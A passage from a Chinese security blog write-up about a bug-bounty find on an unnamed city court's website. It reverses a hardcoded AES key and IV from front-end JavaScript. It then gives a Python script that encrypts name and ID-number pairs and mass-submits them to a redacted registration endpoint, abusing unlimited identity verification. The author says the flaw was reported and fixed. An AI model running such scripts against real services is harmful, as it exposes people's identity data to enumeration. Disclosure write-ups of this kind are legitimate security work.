class="hljs-property">enc</span>.<span class="hljs-property">Utf8</span>.<span class="hljs-title function_">parse</span>(<span class="hljs-string">&quot;ihaierForTodoKey&quot;</span>),<br>        _iv = <span class="hljs-title class_">CryptoJS</span>.<span class="hljs-property">enc</span>.<span class="hljs-property">Utf8</span>.<span class="hljs-title function_">parse</span>(<span class="hljs-string">&quot;ihaierForTodo_Iv&quot;</span>);<br>    <span class="hljs-keyword">var</span> encrypted = <span class="hljs-title class_">CryptoJS</span>.<span class="hljs-property">AES</span>.<span class="hljs-title function_">encrypt</span>(_word, _key, &#123;<br>                <span class="hljs-attr">iv</span>: _iv,<br>                <span class="hljs-attr">mode</span>: <span class="hljs-title class_">CryptoJS</span>.<span class="hljs-property">mode</span>.<span class="hljs-property">CBC</span>,<br>                <span class="hljs-attr">padding</span>: <span class="hljs-title class_">CryptoJS</span>.<span class="hljs-property">pad</span>.<span class="hljs-property">Pkcs7</span><br>        &#125;);<br>    <span class="hljs-keyword">return</span> encrypted.<span class="hljs-title function_">toString</span>();<br>&#125;<br>............<br></code></pre></td></tr></table></figure>
<ul>
<li>首先将输入的字符串转换成 UTF-8格式</li>
<li>然后固定key是<code>ihaierForTodoKey</code>，iv是<code>ihaierForTodo_Iv</code></li>
<li>然后以CBC和PKCS7模式进行aes加密</li>
<li>最后返回加密后的Base64字符串</li>
</ul>
<p>既然整体逻辑知道了，那就直接上Python<br>这里就只贴关键函数了，其他部分写的有点乱</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES<br><span class="hljs-keyword">from</span> Crypto.Util.Padding <span class="hljs-keyword">import</span> pad<br><span class="hljs-keyword">from</span> base64 <span class="hljs-keyword">import</span> b64encode<br><span class="hljs-keyword">import</span> json<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">aes_encrypt</span>(<span class="hljs-params">word, key, iv</span>):<br>    word_bytes = word.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>    key_bytes = key.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>    iv_bytes = iv.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br><br>    cipher = AES.new(key_bytes, AES.MODE_CBC, iv_bytes)<br>    encrypted_bytes = cipher.encrypt(pad(word_bytes, AES.block_size))<br><br>    <span class="hljs-keyword">return</span> b64encode(encrypted_bytes).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">send_encrypted_requests</span>():<br>    key = <span class="hljs-string">&quot;ihaierForTodoKey&quot;</span><br>    iv = <span class="hljs-string">&quot;ihaierForTodo_Iv&quot;</span><br><br>    input_data = load_input_data(<span class="hljs-string">&#x27;input.txt&#x27;</span>)<br><br>    <span class="hljs-keyword">for</span> name, id_num <span class="hljs-keyword">in</span> input_data:<br>        encrypted_name = aes_encrypt(name, key, iv)<br>        encrypted_id = aes_encrypt(id_num, key, iv)<br><br>        data = &#123;<br>            <span class="hljs-string">&#x27;yzm&#x27;</span>: <span class="hljs-string">&#x27;xxx&#x27;</span>,<br>            <span class="hljs-string">&#x27;dsrlx&#x27;</span>: <span class="hljs-string">&#x27;1&#x27;</span>,<br>            <span class="hljs-string">&#x27;zjlx&#x27;</span>: <span class="hljs-string">&#x27;1&#x27;</span>,<br>            <span class="hljs-string">&#x27;zjhm&#x27;</span>: encrypted_id,<br>            <span class="hljs-string">&#x27;name&#x27;</span>: encrypted_name,<br>            <span class="hljs-string">&#x27;dzyx&#x27;</span>: aes_encrypt(<span class="hljs-string">&quot;xxx&quot;</span>, key, iv),  <br>            <span class="hljs-string">&#x27;mm&#x27;</span>: aes_encrypt(<span class="hljs-string">&quot;xxx&quot;</span>, key, iv),  <br>            <span class="hljs-string">&#x27;sjhm&#x27;</span>: aes_encrypt(<span class="hljs-string">&quot;xxx&quot;</span>, key, iv) <br>        &#125;<br><br>        headers = &#123;<br>            略<br>        &#125;<br><br><br>        response = requests.post(<span class="hljs-string">&quot;https://xxx/user/create&quot;</span>, data=data, headers=headers, verify=<span class="hljs-literal">False</span>)<br></code></pre></td></tr></table></figure>

<h2 id="提交漏洞"><a href="#提交漏洞" class="headerlink" title="提交漏洞"></a>提交漏洞</h2><p>测试成功，补写了一个生成身份证的py之后可以实现最初猜测的<strong>无限制二要素验证漏洞</strong>  </p>
<p>直接打包提交补天orCNVD</p>
<p>本次极速漏洞挖掘结束</p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p><strong>截止到发文日期，该漏洞已修复，造成的任何后果与本人无关</strong></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%BC%8F%E6%B4%9E/" class="category-chain-item">漏洞</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Python/" class="print-no-link">#Python</a>
      
        <a href="/tags/%E6%B8%97%E9%80%8F/" class="print-no-link">#渗透</a>
      
        <a href="/tags/JavaScript/" class="print-no-link">#JavaScript</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>记一次某超一线城市中级人民法院的极速漏洞挖掘</div>
      <div>http://blog.luckysix.cc/2024/09/21/记一次某超一线城市中级人民法院的极速漏洞挖掘/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Thanatos</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年9月21日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%AF%B9%E7%A6%8F%E5%B7%9E%E5%B8%82%E6%9F%90%E5%8C%BA%E7%BD%91%E4%B8%8A%E9%98%85%E5%8D%B7%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" title="记一次对福州市某区网上阅卷系统的渗透测试">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">记一次对福州市某区网上阅卷系统的渗透测试</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/08/25/%E7%BF%BB%E5%A2%99%E8%BD%AF%E4%BB%B6%E7%9A%84%E5%AF%B9%E6%89%8B%E9%95%BF%E5%9F%8E%E9%98%B2%E7%81%AB%E5%A2%99-GFW-%E6%98%AF%E5%A6%82%E4%BD%95%E6%A3%80%E6%B5%8B%E5%92%8C%E5%B0%81%E9%94%81%E6%B5%81%E9%87%8F%E7%9A%84/" title="翻墙软件的对手长城防火墙(GFW)是如何检测和封锁流量的">
                        <span class="hidden-mobile">翻墙软件的对手长城防火墙(GFW)是如何检测和封锁流量的</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://blog.luckysix.cc/about"><span>Thanatos</span></a> <i class="iconfont icon-love"></i> <a href="https://blog.luckysix.cc/" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>LA.init({id:"KPLdq1br4Fo42JcH",ck:"KPLdq1br4Fo42JcH",autoTrack:true,screenRecord:true})</script>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
